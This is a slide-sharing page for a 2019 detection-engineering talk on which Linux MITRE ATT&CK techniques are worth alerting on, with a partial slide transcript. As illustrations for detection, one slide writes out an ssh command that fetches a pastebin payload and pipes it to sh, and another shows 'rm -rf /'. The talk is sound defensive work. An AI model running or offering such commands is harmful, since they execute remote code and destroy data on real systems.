Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Alertable Techniques for Linux using MITRE ATT&CK

Alertable Techniques for Linux using MITRE ATT&CK

Community members continually ask, should I have detection capabilities across every technique in ATT&CK? This question inevitably leads to the same conclusion that not every technique is alertable and not all of them provide the same value for immediate detection. In this session we’ll discuss the concept of alertable detections using Linux ATT&CK techniques as a case study. We’ll introduce decision criteria we’ve learned through experience to illustrate the challenges, and we’ll recommend specific techniques that work well with an alert-driven workflow.

Tony M Lambert

October 29, 2019
Tweet

More Decks by Tony M Lambert

Other Decks in Technology

Transcript

  1. ▪ Find & detect adversaries using data ▪ Recovering system

    administrator ▪ Love to teach, hate to grade homework Tony Lambert Detection Engineer/Intel Red Canary @ForensicITGuy id -un
  2. ▪ Notification of abnormal condition ▪ Requires context for triage

    ▪ Requires care and feeding for efficacy What’s an alert?
  3. Decision Criteria for Alerts ▪ Time to investigate (lower is

    better) ▪ Significance of abnormality (urgent is better) ▪ Time to respond (lower is better)
  4. Remote Services (T1021) ssh … [email protected] '(curl hxxps://pastebin.com/payload | sh'

    ▪ Tune out deployment tools ▪ Significant for lateral movement
  5. Anything Discovery whoami, netstat, ifconfig, etc. ▪ OS noise makes

    high volume ▪ Better for cluster analysis
  6. File Deletion (T1107) rm -rf / ▪ Probably non-functional rule

    ▪ Helpdesk will know before the alert